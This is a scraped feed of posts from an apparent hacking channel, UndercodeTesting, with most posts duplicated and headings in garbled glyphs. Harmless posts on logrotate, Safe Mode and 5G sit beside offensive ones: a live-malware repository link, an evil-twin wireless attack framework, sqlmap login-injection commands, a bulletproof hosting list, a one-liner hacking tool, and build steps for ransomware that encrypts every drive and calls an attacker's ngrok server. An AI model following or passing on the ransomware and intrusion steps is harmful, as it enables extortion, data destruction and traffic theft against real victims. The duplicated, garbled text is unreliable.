Top reversed eng/ malwares in one repo :
https://github.com/ytisf/theZoo/tree/master/malwares/Source/Reversed
https://github.com/ytisf/theZoo/tree/master/malwares/Source/Reversed
GitHub
ytisf/theZoo
A repository of LIVE malwares for your own joy and pleasure. theZoo is a project created to make the possibility of malware analysis open and available to the public. - ytisf/theZoo
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Framework designed to automate various wireless networks attacks:
Capture victims' traffic.
MAC address spoofing.
Set-up honeypot and evil twin attacks.
Show the list of in range access points.
Wireless adapter|card|dongle power amplification.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/aress31/wirespy
2) cd wirespy
3) $ chmod +x wirespy.sh
Run the script with root privileges:
4) $ sudo ./wirespy.sh
Attacks:
eviltwin > launch an evil twin attack
honeypot > launch a rogue access point attack
Commands:
clear > clear the terminal
help > list available commands
quit|exit > exit the program
apscan > show all wireless access points nearby
leases > display DHCP leases
powerup > power wireless interface up (may cause issues)
start capture > start packet capture (tcpdump)
stop capture > stop packet capture (tcpdump)
status > show modules status
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Framework designed to automate various wireless networks attacks:
Capture victims' traffic.
MAC address spoofing.
Set-up honeypot and evil twin attacks.
Show the list of in range access points.
Wireless adapter|card|dongle power amplification.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/aress31/wirespy
2) cd wirespy
3) $ chmod +x wirespy.sh
Run the script with root privileges:
4) $ sudo ./wirespy.sh
Attacks:
eviltwin > launch an evil twin attack
honeypot > launch a rogue access point attack
Commands:
clear > clear the terminal
help > list available commands
quit|exit > exit the program
apscan > show all wireless access points nearby
leases > display DHCP leases
powerup > power wireless interface up (may cause issues)
start capture > start packet capture (tcpdump)
stop capture > stop packet capture (tcpdump)
status > show modules status
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - aress31/wirespy: Framework designed to automate various wireless networks attacks (the project was presented on Pentesterβ¦
Framework designed to automate various wireless networks attacks (the project was presented on Pentester Academy TV's toolbox in 2017). - aress31/wirespy
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ post login box injection in SQLMAP
(1) The search-test.txt is the package captured by the package capture tool burp suite and the data is saved as this txt file. When
we use Sqlmap for post-type injection, there are often cases where the request is missed and the injection fails. Here is a little trick, that is, to use sqlmap in combination with burpsuite. This method will be more accurate for post injection testing and it is very easy to operate.
1) Open the target address examplesite .com or http://www.UndercodeTesting.com/Login.asp in the browser
2) Configure the burp proxy (127.0.0.1:8080) to intercept the request
3)Click the submit button in the login form
4) At this time Burp will intercept To our login POST request
5) Copy this post request to txt, I named it search-test.txt and put it in the sqlmap directory
6) Run sqlmap and use the following command:
./sqlmap.py -r search-test.txt -p tfUPass
Here the parameter -r is for sqlmap to load our post request rsearch-test.txt, and -p should be familiar to everyone and specify the parameters for injection.
Injection point: http://testasp.vulnweb.com/Login.asp
Several injection methods: ./sqlmap.py -r search-test.txt -p tfUPass
(2) Automatic search
sqlmap -u [url]http://testasp.vulnweb.com/Login.asp[/url] --forms
(3) Specify parameter search
sqlmap -u [url]http://testasp.vulnweb.com/Login.asp[/url] --data "tfUName=321&tfUPass=321"
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ post login box injection in SQLMAP
(1) The search-test.txt is the package captured by the package capture tool burp suite and the data is saved as this txt file. When
we use Sqlmap for post-type injection, there are often cases where the request is missed and the injection fails. Here is a little trick, that is, to use sqlmap in combination with burpsuite. This method will be more accurate for post injection testing and it is very easy to operate.
1) Open the target address examplesite .com or http://www.UndercodeTesting.com/Login.asp in the browser
2) Configure the burp proxy (127.0.0.1:8080) to intercept the request
3)Click the submit button in the login form
4) At this time Burp will intercept To our login POST request
5) Copy this post request to txt, I named it search-test.txt and put it in the sqlmap directory
6) Run sqlmap and use the following command:
./sqlmap.py -r search-test.txt -p tfUPass
Here the parameter -r is for sqlmap to load our post request rsearch-test.txt, and -p should be familiar to everyone and specify the parameters for injection.
Injection point: http://testasp.vulnweb.com/Login.asp
Several injection methods: ./sqlmap.py -r search-test.txt -p tfUPass
(2) Automatic search
sqlmap -u [url]http://testasp.vulnweb.com/Login.asp[/url] --forms
(3) Specify parameter search
sqlmap -u [url]http://testasp.vulnweb.com/Login.asp[/url] --data "tfUName=321&tfUPass=321"
β β β Uππ»βΊπ«Δπ¬πβ β β β
UNDERCODE COMMUNITY
Photo
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦NEW TWITTER BOT FOR AUTOMATE IN THE CLUB :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) You will need your own Twitter account for testing, since the bot tweets from this account. Generate your Twitter API keys by creating a new app.
2) CLONE THIS CODE https://github.com/freeCodeCamp/100DaysOfCode-twitter-bot
3) Create an .env file and add in your API keys and Twitter handle,
Β» like so:
TWITTER_CONSUMER_KEY=xxxxxxxxxxxxxxxxxxxxdMhxg
TWITTER_CONSUMER_SECRET=xxxxxxxxxxxxxxxxxxxxkFNNj1H107PFv1mvWwEM6CZH0fjymV
TWITTER_ACCESS_TOKEN=xxxxxxxxx-xxxxxxxxxxxxxxxxxxxxecKpi90bFhdsGG2N7iII
TWITTER_ACCESS_TOKEN_SECRET=xxxxxxxxxxxxxxxxxxxxZAU8wNKAPU8Qz2c0PhOo43cGO
QUERY_STRING=#someTestHashtag
TWITTER_USERNAME=YourTestTwitterAccountName
4) Make the Change
5) Change any hashtags to #someTestHashtag to avoid spamming the community hashtag.
6) Run npm/yarn test to check all keys are available before you start.
7) Make your suggested change.
8) Ensure code style follows existing code (run npm run format to apply preferred formatting).
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦NEW TWITTER BOT FOR AUTOMATE IN THE CLUB :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) You will need your own Twitter account for testing, since the bot tweets from this account. Generate your Twitter API keys by creating a new app.
2) CLONE THIS CODE https://github.com/freeCodeCamp/100DaysOfCode-twitter-bot
3) Create an .env file and add in your API keys and Twitter handle,
Β» like so:
TWITTER_CONSUMER_KEY=xxxxxxxxxxxxxxxxxxxxdMhxg
TWITTER_CONSUMER_SECRET=xxxxxxxxxxxxxxxxxxxxkFNNj1H107PFv1mvWwEM6CZH0fjymV
TWITTER_ACCESS_TOKEN=xxxxxxxxx-xxxxxxxxxxxxxxxxxxxxecKpi90bFhdsGG2N7iII
TWITTER_ACCESS_TOKEN_SECRET=xxxxxxxxxxxxxxxxxxxxZAU8wNKAPU8Qz2c0PhOo43cGO
QUERY_STRING=#someTestHashtag
TWITTER_USERNAME=YourTestTwitterAccountName
4) Make the Change
5) Change any hashtags to #someTestHashtag to avoid spamming the community hashtag.
6) Run npm/yarn test to check all keys are available before you start.
7) Make your suggested change.
8) Ensure code style follows existing code (run npm run format to apply preferred formatting).
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - freeCodeCamp/100DaysOfCode-twitter-bot: Twitter bot for #100DaysOfCode
Twitter bot for #100DaysOfCode. Contribute to freeCodeCamp/100DaysOfCode-twitter-bot development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π OWASP APICheck - DevSecOps Toolkit for HTTP API :
APICheck is a set of HTTP API DevSecOps tools, it integrates existing HTTP API tools, easily creates execution chains, and is designed to integrate with third party tools.
APICheck consists of a set of tools that can be linked together to achieve different functions, depending on how they are linked.
It allows you to create chains of execution and can not only integrate self-developed tools, but can also use existing tools to take advantage of them to provide new functionality.
1) Each tool in APICheck is a Docker image.
This means that the tools are a black box that can receive some information on their standard input and write the results to standard output or error output.
2) In addition, the return code can be used to stop the current chain.
π¦Who is the APICheck HTTP API DevSecOps Toolkit for?
3) APICheck focuses on more than just security testing and hacking scenarios, the goal of the project is to become a complete toolbox for DevSecOps loops.
The tools are designed for different user profiles:
Developers
System Administrators
Security Engineers and Penetration Testers
To enable interoperability between teams and tools, they all
share a common JSON data format.
In other words, APICheck commands output JSON documents and also accept them as input.
This allows you to customize your pipelines!
Using the APICheck HTTP API DevSecOps Toolset
After installation, you can start the package manager using the acp command.
https://github.com/OWASP/apicheck
$ acp
Usage : acp [ - h ] [ - w ] { list , info , install , version } . ... ...
APICheck Manager
positional arguments :
{ list , info , install , version }
available actions
list search in A
info show expanded tool info
install install an APICheck tool
version displays version
optional arguments :
- h , - help show this help message and exit
- w , - disable - warning
disable check of RC Shell File
You can download APICheck like this:
pip install apicheck-package-manager
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π OWASP APICheck - DevSecOps Toolkit for HTTP API :
APICheck is a set of HTTP API DevSecOps tools, it integrates existing HTTP API tools, easily creates execution chains, and is designed to integrate with third party tools.
APICheck consists of a set of tools that can be linked together to achieve different functions, depending on how they are linked.
It allows you to create chains of execution and can not only integrate self-developed tools, but can also use existing tools to take advantage of them to provide new functionality.
1) Each tool in APICheck is a Docker image.
This means that the tools are a black box that can receive some information on their standard input and write the results to standard output or error output.
2) In addition, the return code can be used to stop the current chain.
π¦Who is the APICheck HTTP API DevSecOps Toolkit for?
3) APICheck focuses on more than just security testing and hacking scenarios, the goal of the project is to become a complete toolbox for DevSecOps loops.
The tools are designed for different user profiles:
Developers
System Administrators
Security Engineers and Penetration Testers
To enable interoperability between teams and tools, they all
share a common JSON data format.
In other words, APICheck commands output JSON documents and also accept them as input.
This allows you to customize your pipelines!
Using the APICheck HTTP API DevSecOps Toolset
After installation, you can start the package manager using the acp command.
https://github.com/OWASP/apicheck
$ acp
Usage : acp [ - h ] [ - w ] { list , info , install , version } . ... ...
APICheck Manager
positional arguments :
{ list , info , install , version }
available actions
list search in A
info show expanded tool info
install install an APICheck tool
version displays version
optional arguments :
- h , - help show this help message and exit
- w , - disable - warning
disable check of RC Shell File
You can download APICheck like this:
pip install apicheck-package-manager
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - OWASP/apicheck
Contribute to OWASP/apicheck development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is the difference between "5G" and "Wi-Fi 6" and how to use them properly?
1) "5G" (5th generation mobile communication system) and wireless LAN standard "Wi-Fi 6" (standards organization IEEE standard name is "IEEE 802.11ax") have a lot in common.
2) Not only is it a new standard for wireless networks that appeared at about the same time, but it is also the same in that it realizes high-speed data transmission at the gigabit level. With the advent of these two wireless network standards, studies are underway for applications that were unthinkable in the past.
3) In the near future, it is expected that the time for full-scale introduction of networks that adopt these standards will come. What we should consider now for that time is how to utilize these two wireless network standards. The features that realize high-speed data transmission are the same, but each has its own strengths and weaknesses.
4) In addition to using them properly according to the purpose, it may be an option to use the two together in some cases. This document, which is a collection of notable articles from TechTarget Japan, summarizes the differences between 5G and Wi-Fi 6 and introduces the points of utilization.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is the difference between "5G" and "Wi-Fi 6" and how to use them properly?
1) "5G" (5th generation mobile communication system) and wireless LAN standard "Wi-Fi 6" (standards organization IEEE standard name is "IEEE 802.11ax") have a lot in common.
2) Not only is it a new standard for wireless networks that appeared at about the same time, but it is also the same in that it realizes high-speed data transmission at the gigabit level. With the advent of these two wireless network standards, studies are underway for applications that were unthinkable in the past.
3) In the near future, it is expected that the time for full-scale introduction of networks that adopt these standards will come. What we should consider now for that time is how to utilize these two wireless network standards. The features that realize high-speed data transmission are the same, but each has its own strengths and weaknesses.
4) In addition to using them properly according to the purpose, it may be an option to use the two together in some cases. This document, which is a collection of notable articles from TechTarget Japan, summarizes the differences between 5G and Wi-Fi 6 and introduces the points of utilization.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Methode for protect yourself from iploggers ?
1) Hosts - a file stored in the system at
C: \ Windows \ System32 \ drivers \ etc
which contains a database of domain names and corresponding network addresses of nodes.
2) Before a query to DNS servers, data from this file is requested, i.e. it takes precedence and is solely controlled by you or your organization's administrators.
Using the hosts file, you can block access to specific sites, block ads by adding specific nodes, block Microsoft telemetry, etc.
3) To set the IP address of your computer, attackers can use IPlogger by sending you links, pictures, etc.
After clicking on this link, the attacker gets your IP.
4) To block iploggers, redirect their domain names to the network address 0.0.0.0 (this is a special non-routable address pointing to a non-existent host ) by specifying the following in the host file and saving:
# This is a sample HOSTS file used by Microsoft TCP / IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
127.0.0.1 localhost
0.0.0.0 ezstat.ru
0.0.0.0 iplogger.org
0.0.0.0 2no.co
0.0.0.0 iplogger.com
0.0.0.0 iplogger.ru
0.0.0.0 yip.su
0.0.0.0 iplogger.co
0.0.0.0 iplogger.info
0.0.0.0 ipgrabber.ru
0.0.0.0 ipgraber.ru
0.0.0.0 iplis.ru
0.0.0.0 02ip.ru
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Methode for protect yourself from iploggers ?
1) Hosts - a file stored in the system at
C: \ Windows \ System32 \ drivers \ etc
which contains a database of domain names and corresponding network addresses of nodes.
2) Before a query to DNS servers, data from this file is requested, i.e. it takes precedence and is solely controlled by you or your organization's administrators.
Using the hosts file, you can block access to specific sites, block ads by adding specific nodes, block Microsoft telemetry, etc.
3) To set the IP address of your computer, attackers can use IPlogger by sending you links, pictures, etc.
After clicking on this link, the attacker gets your IP.
4) To block iploggers, redirect their domain names to the network address 0.0.0.0 (this is a special non-routable address pointing to a non-existent host ) by specifying the following in the host file and saving:
# This is a sample HOSTS file used by Microsoft TCP / IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
127.0.0.1 localhost
0.0.0.0 ezstat.ru
0.0.0.0 iplogger.org
0.0.0.0 2no.co
0.0.0.0 iplogger.com
0.0.0.0 iplogger.ru
0.0.0.0 yip.su
0.0.0.0 iplogger.co
0.0.0.0 iplogger.info
0.0.0.0 ipgrabber.ru
0.0.0.0 ipgraber.ru
0.0.0.0 iplis.ru
0.0.0.0 02ip.ru
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ways to boot Windows 10 in Safe Mode :
A) Accessing Safe Mode from Windows 10 Settings
This is the most common method for accessing Safe Mode, where you can control the system and access settings.
Here's how to do it:
1) From the Start menu, go to Windows Settings and click Windows Security.
2) Then go to "Recovery"
3) Windows will restart and open Windows Recovery Environment (WinRE).
Here go to Troubleshoot> Advanced options> Startup options> Restart.
4) Your computer will restart and a page with a set of commands to choose from will open.
5) press the 4 key or the f4 key to start Safe Mode.
B) Using commands from the command line
If you only have command prompt access, you can run a command that will reboot your computer into Windows Recovery Environment, where you can access Safe Mode.
1) To access Command Prompt in Windows 10, press Windows Key + R to open the Run dialog and type cmd here to open Command Prompt.
2) enter the command:
> shutdown.exe /r /o
3) After a short delay, Windows will restart into Windows Recovery
C) You can also boot into Safe Mode from the login screen if you cannot login for some reason
All you have to do is press the power button in the lower right corner and then hold down the Shift key and press the restart button.
This will restart your computer and you will enter the Windows recovery environment.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ways to boot Windows 10 in Safe Mode :
A) Accessing Safe Mode from Windows 10 Settings
This is the most common method for accessing Safe Mode, where you can control the system and access settings.
Here's how to do it:
1) From the Start menu, go to Windows Settings and click Windows Security.
2) Then go to "Recovery"
3) Windows will restart and open Windows Recovery Environment (WinRE).
Here go to Troubleshoot> Advanced options> Startup options> Restart.
4) Your computer will restart and a page with a set of commands to choose from will open.
5) press the 4 key or the f4 key to start Safe Mode.
B) Using commands from the command line
If you only have command prompt access, you can run a command that will reboot your computer into Windows Recovery Environment, where you can access Safe Mode.
1) To access Command Prompt in Windows 10, press Windows Key + R to open the Run dialog and type cmd here to open Command Prompt.
2) enter the command:
> shutdown.exe /r /o
3) After a short delay, Windows will restart into Windows Recovery
C) You can also boot into Safe Mode from the login screen if you cannot login for some reason
All you have to do is press the power button in the lower right corner and then hold down the Shift key and press the restart button.
This will restart your computer and you will enter the Windows recovery environment.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π Bulletproof Hosting List (2020 Version)
vdsinside.com
vhoster.net
vinahost.vn
vinastar.net
vit.com.tr
vscale.io
vstoike.ru
webcare360.com
www.1984hosting.com
www.altushost.com
www.anonymoushosting.in
www.artmotion.eu
www.bacloud.com
www.bahnhof.net
www.cubexsweatherly.com
www.deltasystem.cl
www.dreamwebhosting.net
www.elvsoft.com
www.eserver.ru
www.flokinet.is
www.globatel.org
www.heberjahiz.com
www.host.al
www.hosthink.net
www.hostname.cl
www.hostoweb.com
www.ihc.ru
www.ihor.ru
www.infomaniak.ch
www.localhost.tn
www.m247.ro/en/
www.nine.ch
www.ninet.rs
www.nonamehosts.com
www.oblaci.rs
www.orangewebsite.com
www.pachosting.hk
www.voxility.com
www.vps.ag
www.vpsbg.eu
www.wavecom.ee
www.webhost.tn
www.webonic.hu
www.xenyohosting.com
www.xhostfire.com
www.yourserver.se
www.zgh.cl
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π Bulletproof Hosting List (2020 Version)
vdsinside.com
vhoster.net
vinahost.vn
vinastar.net
vit.com.tr
vscale.io
vstoike.ru
webcare360.com
www.1984hosting.com
www.altushost.com
www.anonymoushosting.in
www.artmotion.eu
www.bacloud.com
www.bahnhof.net
www.cubexsweatherly.com
www.deltasystem.cl
www.dreamwebhosting.net
www.elvsoft.com
www.eserver.ru
www.flokinet.is
www.globatel.org
www.heberjahiz.com
www.host.al
www.hosthink.net
www.hostname.cl
www.hostoweb.com
www.ihc.ru
www.ihor.ru
www.infomaniak.ch
www.localhost.tn
www.m247.ro/en/
www.nine.ch
www.ninet.rs
www.nonamehosts.com
www.oblaci.rs
www.orangewebsite.com
www.pachosting.hk
www.voxility.com
www.vps.ag
www.vpsbg.eu
www.wavecom.ee
www.webhost.tn
www.webonic.hu
www.xenyohosting.com
www.xhostfire.com
www.yourserver.se
www.zgh.cl
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
M247Global
M247 Global β Your Trusted Global Hosting Provider
M247 Global Offers IP Transit, Cloud, Hosting & Connectivity From 36+ Data Centersβ Trusted Worldwide For Fast, Secure Infrastructure.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ How to set up and manage log rotation using Logrotate on Linux :
A) Installing Logrotate on Linux
To install logrotate just use your package manager:
---------- On Debian and Ubuntu ----------
# aptitude update && aptitude install logrotate
---------- On CentOS, RHEL and Fedora ----------
# yum update && yum install logrotate
B) It is worth noting that the configuration file (/etc/logrotate.conf) may indicate that other, more specific settings may be placed in separate .conf files inside /etc/logrotate.d.
This will be the case if and only if the following line exists and is not commented out:
include /etc/logrotate.d
C) We will stick to this approach as it will help us keep things tidy and will use the Debian box for the following examples.
Configuring Logrotate on Linux
D) As a very versatile tool, logrotate provides many directives to help us customize when and how the logs will be rotated, and what should happen immediately afterwards.
E) Let's paste the following content into /etc/logrotate.d/apache2.conf (note that you will most likely need to create this file) and examine each line.
/ var / log / apache2 / * {
weekly
rotate 3
size 10M
compress
delaycompress
}
F) The first line indicates that the directives inside the block apply to all logs inside / var / log / apache2:
weekly means the tool will try to update the logs on a weekly basis. Other possible values ββare daily and monthly.
rotate 3 indicates that only 3 rotations should be left. Thus, the oldest file will be deleted on the fourth subsequent run.
size = 10M sets the minimum size for rotation to 10M. In other words, each log will not rotate until it reaches 10MB.
compress and delaycompress are used to specify that all but the most recent logs being processed should be compressed.
Let's do a dry run to see what logrotate would do if it were actually executed now.
Use the -d option followed by the config file (you can run logrotate by omitting this option):
# logrotate -d /etc/logrotate.d/apache2.conf
Instead of compressing the logs, we could rename them according to the date they were rewritten.
To do this, we'll use the dateext directive.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ How to set up and manage log rotation using Logrotate on Linux :
A) Installing Logrotate on Linux
To install logrotate just use your package manager:
---------- On Debian and Ubuntu ----------
# aptitude update && aptitude install logrotate
---------- On CentOS, RHEL and Fedora ----------
# yum update && yum install logrotate
B) It is worth noting that the configuration file (/etc/logrotate.conf) may indicate that other, more specific settings may be placed in separate .conf files inside /etc/logrotate.d.
This will be the case if and only if the following line exists and is not commented out:
include /etc/logrotate.d
C) We will stick to this approach as it will help us keep things tidy and will use the Debian box for the following examples.
Configuring Logrotate on Linux
D) As a very versatile tool, logrotate provides many directives to help us customize when and how the logs will be rotated, and what should happen immediately afterwards.
E) Let's paste the following content into /etc/logrotate.d/apache2.conf (note that you will most likely need to create this file) and examine each line.
/ var / log / apache2 / * {
weekly
rotate 3
size 10M
compress
delaycompress
}
F) The first line indicates that the directives inside the block apply to all logs inside / var / log / apache2:
weekly means the tool will try to update the logs on a weekly basis. Other possible values ββare daily and monthly.
rotate 3 indicates that only 3 rotations should be left. Thus, the oldest file will be deleted on the fourth subsequent run.
size = 10M sets the minimum size for rotation to 10M. In other words, each log will not rotate until it reaches 10MB.
compress and delaycompress are used to specify that all but the most recent logs being processed should be compressed.
Let's do a dry run to see what logrotate would do if it were actually executed now.
Use the -d option followed by the config file (you can run logrotate by omitting this option):
# logrotate -d /etc/logrotate.d/apache2.conf
Instead of compressing the logs, we could rename them according to the date they were rewritten.
To do this, we'll use the dateext directive.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK Windows, Linux, macOS or even BSD systems :
F E A T U R E S :
A lot of liners use with different purposes, currently are more than 176 liner.
The auto-complete feature that has been implemented in this framework is not the usual one you always see, here are some highlights:
It's designed to fix typos in typed commands to the most similar command with just one tab click so seach becomes search and so on, even if you typed any random word similar to an command in this framework.
For you lazy-ones out there like me, it can predict what liner you are trying to use by typing any part of it. For example if you typed use capabilities and clicked tab, it would be replaced with use linux/bash/list_all_capabilities and so on. I can see your smile, You are welcome!
If you typed any wrong command then pressed enter, the framework will tell you what is the nearest command to what you have typed which could be the one you really wanted.
Some less impressive things like auto-complete for variables after set command, auto-complete for liners after use and info commands and finally it converts all uppercase to lowercase automatically just-in-case you switched cases by mistake while typing.
Finally, you'll find your normal auto-completion things you were using before, like commands auto-completion and persistent history, etc...
Automation
You can automatically copy the liner you want to clipboard with command copy <liner> instead of using use <liner> and then copying it which saves a lot of time, of course, if you merged it with the following features.
As you may noticed, you can use a resource file from command-line arguments before starting the framework itself or send commands directly.
Inside the framework you can use makerc command like in Metasploit but this time it only saves the correct important commands.
There are history and resource commands so you don't need to exit the framework.
You can execute as many commands as you want at the same time by splitting them with semi-colon.
Searching for any liner here is so easy and accurate, you can search for a liner by its name, function, description, author who added the liner to the framework or even the liner itself.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/D4Vinci/One-Lin3r
2) cd One-Lin3r
3) sudo apt install libncurses5-dev
4) sudo pip3 install ./One-Lin3r --user
5) one-lin3r -h
( debian/ubuntu/kali/parrot)
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK Windows, Linux, macOS or even BSD systems :
F E A T U R E S :
A lot of liners use with different purposes, currently are more than 176 liner.
The auto-complete feature that has been implemented in this framework is not the usual one you always see, here are some highlights:
It's designed to fix typos in typed commands to the most similar command with just one tab click so seach becomes search and so on, even if you typed any random word similar to an command in this framework.
For you lazy-ones out there like me, it can predict what liner you are trying to use by typing any part of it. For example if you typed use capabilities and clicked tab, it would be replaced with use linux/bash/list_all_capabilities and so on. I can see your smile, You are welcome!
If you typed any wrong command then pressed enter, the framework will tell you what is the nearest command to what you have typed which could be the one you really wanted.
Some less impressive things like auto-complete for variables after set command, auto-complete for liners after use and info commands and finally it converts all uppercase to lowercase automatically just-in-case you switched cases by mistake while typing.
Finally, you'll find your normal auto-completion things you were using before, like commands auto-completion and persistent history, etc...
Automation
You can automatically copy the liner you want to clipboard with command copy <liner> instead of using use <liner> and then copying it which saves a lot of time, of course, if you merged it with the following features.
As you may noticed, you can use a resource file from command-line arguments before starting the framework itself or send commands directly.
Inside the framework you can use makerc command like in Metasploit but this time it only saves the correct important commands.
There are history and resource commands so you don't need to exit the framework.
You can execute as many commands as you want at the same time by splitting them with semi-colon.
Searching for any liner here is so easy and accurate, you can search for a liner by its name, function, description, author who added the liner to the framework or even the liner itself.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/D4Vinci/One-Lin3r
2) cd One-Lin3r
3) sudo apt install libncurses5-dev
4) sudo pip3 install ./One-Lin3r --user
5) one-lin3r -h
( debian/ubuntu/kali/parrot)
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - D4Vinci/One-Lin3r: Gives you one-liners that aids in penetration testing operations, privilege escalation and more
Gives you one-liners that aids in penetration testing operations, privilege escalation and more - D4Vinci/One-Lin3r
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How can a Neptune exploit kit distributes Monero miner ?
1) Cybercriminals use the Neptune exploit kit in a malicious miner distribution campaign. This is reported by experts from the firm FireEye. Neptune, also known as Terror, Blaze, and Eris, was originally thought to be a variant of the Sundown exploit kit due to its similarity in code. With the disappearance of kits such as Angler and Neutrino, Sundown also declined in activity, giving way to RIG.
2) However, Neptune has gained popularity and is still used in malicious advertising campaigns, in particular those aimed at distributing cryptocurrency miners. FireEye recently discovered several changes in Neptune attacks, including URI patterns, landing pages, and malicious payload.
3) Attackers use a legitimate pop-up ad service to spread malware. Cybercriminals also disguise their sites by changing the top-level domain from .com to .club (for example, highspirittreks.com and highspirittreks.club). One such malicious site also mimics the YouTube video to MP3 converter.
4) Typically, malicious ads for this campaign are found on popular torrent sites. When a user enters one of these sites, an attempt is made to exploit three vulnerabilities in Internet Explorer and two in Adobe Flash Player. It is noteworthy that none of the exploited vulnerabilities are new, they were all disclosed back in 2014-2016.
5) The miner itself is targeting the Monero cryptocurrency, currently one Monero is $ 86. Countries and continents affected by this pest include: South Korea (29%), Europe (19%), Thailand (13%), the Middle East (13%) and the United States (10%).
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How can a Neptune exploit kit distributes Monero miner ?
1) Cybercriminals use the Neptune exploit kit in a malicious miner distribution campaign. This is reported by experts from the firm FireEye. Neptune, also known as Terror, Blaze, and Eris, was originally thought to be a variant of the Sundown exploit kit due to its similarity in code. With the disappearance of kits such as Angler and Neutrino, Sundown also declined in activity, giving way to RIG.
2) However, Neptune has gained popularity and is still used in malicious advertising campaigns, in particular those aimed at distributing cryptocurrency miners. FireEye recently discovered several changes in Neptune attacks, including URI patterns, landing pages, and malicious payload.
3) Attackers use a legitimate pop-up ad service to spread malware. Cybercriminals also disguise their sites by changing the top-level domain from .com to .club (for example, highspirittreks.com and highspirittreks.club). One such malicious site also mimics the YouTube video to MP3 converter.
4) Typically, malicious ads for this campaign are found on popular torrent sites. When a user enters one of these sites, an attempt is made to exploit three vulnerabilities in Internet Explorer and two in Adobe Flash Player. It is noteworthy that none of the exploited vulnerabilities are new, they were all disclosed back in 2014-2016.
5) The miner itself is targeting the Monero cryptocurrency, currently one Monero is $ 86. Countries and continents affected by this pest include: South Korea (29%), Europe (19%), Thailand (13%), the Middle East (13%) and the United States (10%).
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦The original crypto- free - Ransomware :))
F E A T U R E S :
Run in Background (or not)
Encrypt files using AES-256-CTR(Counter Mode) with random IV for each file.
Multithreaded.
RSA-4096 to secure the client/server communication.
Includes an Unlocker.
Optional TOR Proxy support.
Use an AES CTR Cypher with stream encryption to avoid load an
entire file into memory.
Walk all drives by default.
Docker image for compilation.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
First of all download the project outside your $GOPATH:
1) git clone github.com/mauri870/ransomware
2) cd ransomware
If you have Docker skip to the next section.
You need Go at least 1.11.2 with the $GOPATH/bin in your $PATH and $GOROOT pointing to your Go installation folder. For me:
3) export GOPATH=~/gopath
export PATH=$PATH:$GOPATH/bin
export GOROOT=/usr/local/go
4) Build the project require a lot of steps, like the RSA key generation, build three binaries, embed manifest files, so, let's leave make do your job:
make deps
make
5) You can build the server for windows with make -e GOOS=windows.
(Docker
./build-docker.sh make)
6) First of all lets start our external domain:
ngrok http 8080
7) This command will give us a url like http://2af7161c.ngrok.io. Keep this command running otherwise the malware won't reach our server.
Let's compile the binaries (remember to replace the domain):
make -e SERVER_HOST=2af7161c.ngrok.io SERVER_PORT=80 USE_TOR=true
8) The SERVER_PORT needs to be 80 in this case, since ngrok redirects 2af7161c.ngrok.io:80 to your local server port 8080.
